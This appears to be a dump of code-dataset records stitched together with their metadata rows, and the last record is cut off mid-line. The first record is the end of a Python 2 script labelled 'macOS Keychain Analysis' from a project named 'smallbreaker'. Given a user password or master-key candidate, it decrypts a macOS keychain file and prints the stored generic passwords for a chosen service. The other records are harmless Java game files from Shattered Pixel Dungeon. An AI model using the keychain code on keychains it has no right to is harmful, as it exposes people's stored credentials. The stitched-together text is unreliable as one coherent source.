def findWrappingKey(self, master, symmetrickey_offset):
base_addr = sizeof(_APPL_DB_HEADER) + symmetrickey_offset + 0x38
# startCryptoBlob
cipher_text_offset = struct.unpack('>I', self.fbuf[base_addr + 8:base_addr + 8 + ATOM_SIZE])[0]
# totalength
totallength = struct.unpack('>I', self.fbuf[base_addr + 12:base_addr + 12 + ATOM_SIZE])[0]
# IV
IVLEN = 8
iv = self.fbuf[base_addr + 64:base_addr + 64 + IVLEN]
# get cipher text area
ciphertext = self.fbuf[base_addr + cipher_text_offset:base_addr + totallength]
# decrypt the key
plain = kcdecrypt(master, iv, ciphertext)
if plain.__len__() == 0:
return ''
dbkey = plain[0:KEYLEN]
# return encrypted wrapping key
return dbkey
# SOURCE : extractkeychain.py
def kcdecrypt(key, iv, data):
if len(data) == 0:
#print>>stderr, "FileSize is 0"
return data
if len(data) % BLOCKSIZE != 0:
return data
cipher = triple_des(key, CBC, iv)
# the line below is for pycrypto instead
#cipher = DES3.new( key, DES3.MODE_CBC, iv )
plain = cipher.decrypt(data)
# now check padding
pad = ord(plain[-1])
if pad > 8:
#print>> stderr, "Bad padding byte. You probably have a wrong password"
return ''
for z in plain[-pad:]:
if ord(z) != pad:
#print>> stderr, "Bad padding. You probably have a wrong password"
return ''
plain = plain[:-pad]
return plain
def main():
parser = argparse.ArgumentParser(description='macOS Keychain Analysis')
parser.add_argument('-f', '--file', nargs=1, help='Keychain file(*.keychain)', required=True)
#parser.add_argument('-x', '--exportfile', nargs=1, help='Export a filename (SQLite, optional)', required=False)
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('-k', '--key', nargs=1, help='Masterkey candidate', required=False)
group.add_argument('-p', '--password', nargs=1, help='User Password', required=False)
parser.add_argument('-s', '--servicename', nargs=1, help='Keychain Service Name', required=True)
args = parser.parse_args()
if os.path.exists(args.file[0]) is False:
print '[!] ERROR: Keychain does not exists'
exit()
serviceName = args.servicename[0]
keychain = KeyChain(args.file[0])
if keychain.open() is False:
print '[!] ERROR: %s Open Failed'%args.file[0]
exit()
KeychainHeader = keychain.getHeader()
if KeychainHeader.Signature != KEYCHAIN_SIGNATURE:
print '[!] ERROR: Invalid Keychain Format'
exit()
SchemaInfo, TableList = keychain.getSchemaInfo(KeychainHeader.SchemaOffset)
TableMetadata, RecordList = keychain.getTable(TableList[0])
tableCount, tableEnum = keychain.getTablenametoList(RecordList, TableList)
# generate database key
if args.password is not None:
masterkey = keychain.generateMasterKey(args.password[0], TableList[tableEnum[CSSM_DL_DB_RECORD_METADATA]])
dbkey = keychain.findWrappingKey(masterkey, TableList[tableEnum[CSSM_DL_DB_RECORD_METADATA]])
elif args.key is not None:
dbkey = keychain.findWrappingKey(unhexlify(args.key[0]), TableList[tableEnum[CSSM_DL_DB_RECORD_METADATA]])
else:
print '[!] ERROR: password or master key candidate'
exit()
key_list = {} # keyblob list
TableMetadata, symmetrickey_list = keychain.getTable(TableList[tableEnum[CSSM_DL_DB_RECORD_SYMMETRIC_KEY]])
for symmetrickey_record in symmetrickey_list:
keyblob, ciphertext, iv, return_value = keychain.getKeyblobRecord(TableList[tableEnum[CSSM_DL_DB_RECORD_SYMMETRIC_KEY]],
symmetrickey_record)
if return_value == 0:
passwd = keychain.KeyblobDecryption(ciphertext, iv, dbkey)
if passwd != '':
key_list[keyblob] = passwd
try:
TableMetadata, genericpw_list = keychain.getTable(TableList[tableEnum[CSSM_DL_DB_RECORD_GENERIC_PASSWORD]])
for genericpw in genericpw_list:
record = keychain.getGenericPWRecord(TableList[tableEnum[CSSM_DL_DB_RECORD_GENERIC_PASSWORD]], genericpw)
if not serviceName in record[-1]: #gets only the specified servicename
pass
else:
try:
real_key = key_list[record[0][0:20]]
passwd = keychain.DBBlobDecryption(record[0], real_key)
except KeyError:
passwd = ''
print passwd
except KeyError:
print '[!] ERROR: Generic Password Table is not available'
exit()
exit()
if __name__ == "__main__":
main()
| 61,732 | smallbreaker | py | en | python | code | {"qsc_code_num_words": 7702, "qsc_code_num_chars": 61732.0, "qsc_code_mean_word_length": 4.59465074, "qsc_code_frac_words_unique": 0.154765, "qsc_code_frac_chars_top_2grams": 0.02119362, "qsc_code_frac_chars_top_3grams": 0.03102747, "qsc_code_frac_chars_top_4grams": 0.03673562, "qsc_code_frac_chars_dupe_5grams": 0.40106816, "qsc_code_frac_chars_dupe_6grams": 0.36113937, "qsc_code_frac_chars_dupe_7grams": 0.31719792, "qsc_code_frac_chars_dupe_8grams": 0.29074828, "qsc_code_frac_chars_dupe_9grams": 0.23889454, "qsc_code_frac_chars_dupe_10grams": 0.22956935, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.06146641, "qsc_code_frac_chars_whitespace": 0.27710102, "qsc_code_size_file_byte": 61732.0, "qsc_code_num_lines": 1724.0, "qsc_code_num_chars_line_max": 135.0, "qsc_code_num_chars_line_mean": 35.80742459, "qsc_code_frac_chars_alphabet": 0.73152422, "qsc_code_frac_chars_comments": 0.10945701, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.26845638, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.15273106, "qsc_code_frac_chars_long_word_length": 0.05100214, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.01809563, "qsc_code_frac_lines_prompt_comments": 0.00058005, "qsc_code_frac_lines_assert": 0.0, "qsc_codepython_cate_ast": 0.0, "qsc_codepython_frac_lines_func_ratio": null, "qsc_codepython_cate_var_zero": null, "qsc_codepython_frac_lines_pass": 0.01845638, "qsc_codepython_frac_lines_import": 0.01006711, "qsc_codepython_frac_lines_simplefunc": null, "qsc_codepython_score_lines_no_logic": null, "qsc_codepython_frac_lines_print": 0.00671141} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codepython_cate_ast": 1, "qsc_codepython_frac_lines_func_ratio": 0, "qsc_codepython_cate_var_zero": 0, "qsc_codepython_frac_lines_pass": 0, "qsc_codepython_frac_lines_import": 0, "qsc_codepython_frac_lines_simplefunc": 0, "qsc_codepython_score_lines_no_logic": 0, "qsc_codepython_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/effects/BlobEmitter.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.effects;
import com.shatteredpixel.shatteredpixeldungeon.Dungeon;
import com.shatteredpixel.shatteredpixeldungeon.actors.blobs.Blob;
import com.shatteredpixel.shatteredpixeldungeon.tiles.DungeonTilemap;
import com.watabou.noosa.particles.Emitter;
import com.watabou.utils.Random;
public class BlobEmitter extends Emitter {
private Blob blob;
public BlobEmitter( Blob blob ) {
super();
this.blob = blob;
blob.use( this );
}
@Override
protected void emit( int index ) {
if (blob.volume <= 0) {
return;
}
if (blob.area.isEmpty())
blob.setupArea();
int[] map = blob.cur;
float size = DungeonTilemap.SIZE;
int cell;
for (int i = blob.area.left; i < blob.area.right; i++) {
for (int j = blob.area.top; j < blob.area.bottom; j++) {
cell = i + j*Dungeon.level.width();
if (cell < Dungeon.level.heroFOV.length
&& (Dungeon.level.heroFOV[cell] || blob.alwaysVisible)
&& map[cell] > 0) {
float x = (i + Random.Float()) * size;
float y = (j + Random.Float()) * size;
factory.emit(this, index, x, y);
}
}
}
}
}
| 1,929 | BlobEmitter | java | en | java | code | {"qsc_code_num_words": 262, "qsc_code_num_chars": 1929.0, "qsc_code_mean_word_length": 5.09160305, "qsc_code_frac_words_unique": 0.50381679, "qsc_code_frac_chars_top_2grams": 0.03373313, "qsc_code_frac_chars_top_3grams": 0.11394303, "qsc_code_frac_chars_top_4grams": 0.04272864, "qsc_code_frac_chars_dupe_5grams": 0.06146927, "qsc_code_frac_chars_dupe_6grams": 0.04197901, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01228978, "qsc_code_frac_chars_whitespace": 0.19854847, "qsc_code_size_file_byte": 1929.0, "qsc_code_num_lines": 68.0, "qsc_code_num_chars_line_max": 72.0, "qsc_code_num_chars_line_mean": 28.36764706, "qsc_code_frac_chars_alphabet": 0.85058215, "qsc_code_frac_chars_comments": 0.40487299, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.02702703, "qsc_codejava_score_lines_no_logic": 0.27027027, "qsc_codejava_frac_words_no_modifier": 0.5, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/effects/TorchHalo.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.effects;
import com.shatteredpixel.shatteredpixeldungeon.sprites.CharSprite;
import com.watabou.glwrap.Blending;
import com.watabou.noosa.Game;
import com.watabou.noosa.Halo;
public class TorchHalo extends Halo {
private CharSprite target;
private float phase = 0;
public TorchHalo( CharSprite sprite ) {
super( 20, 0xFFDDCC, 0.2f );
target = sprite;
am = 0;
}
@Override
public void update() {
super.update();
if (phase < 0) {
if ((phase += Game.elapsed) >= 0) {
killAndErase();
} else {
scale.set( (2 + phase) * radius / RADIUS );
am = -phase * brightness;
}
} else if (phase < 1) {
if ((phase += Game.elapsed) >= 1) {
phase = 1;
}
scale.set( phase * radius / RADIUS );
am = phase * brightness;
}
point( target.x + target.width / 2, target.y + target.height / 2 );
}
@Override
public void draw() {
Blending.setLightMode();
super.draw();
Blending.setNormalMode();
}
public void putOut() {
phase = -1;
}
}
| 1,828 | TorchHalo | java | en | java | code | {"qsc_code_num_words": 242, "qsc_code_num_chars": 1828.0, "qsc_code_mean_word_length": 5.13636364, "qsc_code_frac_words_unique": 0.52479339, "qsc_code_frac_chars_top_2grams": 0.02896219, "qsc_code_frac_chars_top_3grams": 0.0313757, "qsc_code_frac_chars_top_4grams": 0.0458568, "qsc_code_frac_chars_dupe_5grams": 0.12067578, "qsc_code_frac_chars_dupe_6grams": 0.09975865, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.02293259, "qsc_code_frac_chars_whitespace": 0.21280088, "qsc_code_size_file_byte": 1828.0, "qsc_code_num_lines": 72.0, "qsc_code_num_chars_line_max": 72.0, "qsc_code_num_chars_line_mean": 25.38888889, "qsc_code_frac_chars_alphabet": 0.84086171, "qsc_code_frac_chars_comments": 0.42724289, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.04761905, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.00764088, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.07142857, "qsc_codejava_score_lines_no_logic": 0.21428571, "qsc_codejava_frac_words_no_modifier": 0.75, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/weapon/melee/Glaive.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.weapon.melee;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
public class Glaive extends MeleeWeapon {
{
image = ItemSpriteSheet.GLAIVE;
tier = 5;
DLY = 1.5f; //0.67x speed
RCH = 2; //extra reach
}
@Override
public int max(int lvl) {
return Math.round(6.67f*(tier+1)) + //40 base, up from 30
lvl*Math.round(1.33f*(tier+1)); //+8 per level, up from +6
}
}
| 1,250 | Glaive | java | en | java | code | {"qsc_code_num_words": 185, "qsc_code_num_chars": 1250.0, "qsc_code_mean_word_length": 4.85945946, "qsc_code_frac_words_unique": 0.66486486, "qsc_code_frac_chars_top_2grams": 0.03670745, "qsc_code_frac_chars_top_3grams": 0.04338154, "qsc_code_frac_chars_top_4grams": 0.06340378, "qsc_code_frac_chars_dupe_5grams": 0.09121246, "qsc_code_frac_chars_dupe_6grams": 0.06229143, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.03758655, "qsc_code_frac_chars_whitespace": 0.1912, "qsc_code_size_file_byte": 1250.0, "qsc_code_num_lines": 41.0, "qsc_code_num_chars_line_max": 73.0, "qsc_code_num_chars_line_mean": 30.48780488, "qsc_code_frac_chars_alphabet": 0.85163205, "qsc_code_frac_chars_comments": 0.6832, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 1.0, "qsc_codejava_frac_lines_func_ratio": 0.06666667, "qsc_codejava_score_lines_no_logic": 0.2, "qsc_codejava_frac_words_no_modifier": 0.5, "qsc_codejava_frac_words_legal_var_name": null, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 1, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/weapon/melee/Gloves.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.weapon.melee;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
public class Gloves extends MeleeWeapon {
{
image = ItemSpriteSheet.GLOVES;
tier = 1;
DLY = 0.5f; //2x speed
bones = false;
}
@Override
public int max(int lvl) {
return (int)(3f*(tier+1)) + //6 base, down from 10
lvl*tier; //+1 per level, down from +2
}
}
| 1,226 | Gloves | java | en | java | code | {"qsc_code_num_words": 175, "qsc_code_num_chars": 1226.0, "qsc_code_mean_word_length": 4.99428571, "qsc_code_frac_words_unique": 0.66285714, "qsc_code_frac_chars_top_2grams": 0.03775744, "qsc_code_frac_chars_top_3grams": 0.04462243, "qsc_code_frac_chars_top_4grams": 0.06521739, "qsc_code_frac_chars_dupe_5grams": 0.09382151, "qsc_code_frac_chars_dupe_6grams": 0.06407323, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.02871795, "qsc_code_frac_chars_whitespace": 0.20473083, "qsc_code_size_file_byte": 1226.0, "qsc_code_num_lines": 42.0, "qsc_code_num_chars_line_max": 73.0, "qsc_code_num_chars_line_mean": 29.19047619, "qsc_code_frac_chars_alphabet": 0.86769231, "qsc_code_frac_chars_comments": 0.68597064, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 1.0, "qsc_codejava_frac_lines_func_ratio": 0.06666667, "qsc_codejava_score_lines_no_logic": 0.2, "qsc_codejava_frac_words_no_modifier": 0.5, "qsc_codejava_frac_words_legal_var_name": null, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 1, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/weapon/melee/Mace.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.weapon.melee;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
public class Mace extends MeleeWeapon {
{
image = ItemSpriteSheet.MACE;
tier = 3;
ACC = 1.28f; //28% boost to accuracy
}
@Override
public int max(int lvl) {
return 4*(tier+1) + //16 base, down from 20
lvl*(tier+1); //scaling unchanged
}
}
| 1,192 | Mace | java | en | java | code | {"qsc_code_num_words": 171, "qsc_code_num_chars": 1192.0, "qsc_code_mean_word_length": 5.07017544, "qsc_code_frac_words_unique": 0.66666667, "qsc_code_frac_chars_top_2grams": 0.03806228, "qsc_code_frac_chars_top_3grams": 0.0449827, "qsc_code_frac_chars_top_4grams": 0.06574394, "qsc_code_frac_chars_dupe_5grams": 0.09457901, "qsc_code_frac_chars_dupe_6grams": 0.06459054, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.03115265, "qsc_code_frac_chars_whitespace": 0.19211409, "qsc_code_size_file_byte": 1192.0, "qsc_code_num_lines": 40.0, "qsc_code_num_chars_line_max": 73.0, "qsc_code_num_chars_line_mean": 29.8, "qsc_code_frac_chars_alphabet": 0.86915888, "qsc_code_frac_chars_comments": 0.70973154, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 1.0, "qsc_codejava_frac_lines_func_ratio": 0.07142857, "qsc_codejava_score_lines_no_logic": 0.21428571, "qsc_codejava_frac_words_no_modifier": 0.5, "qsc_codejava_frac_words_legal_var_name": null, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, 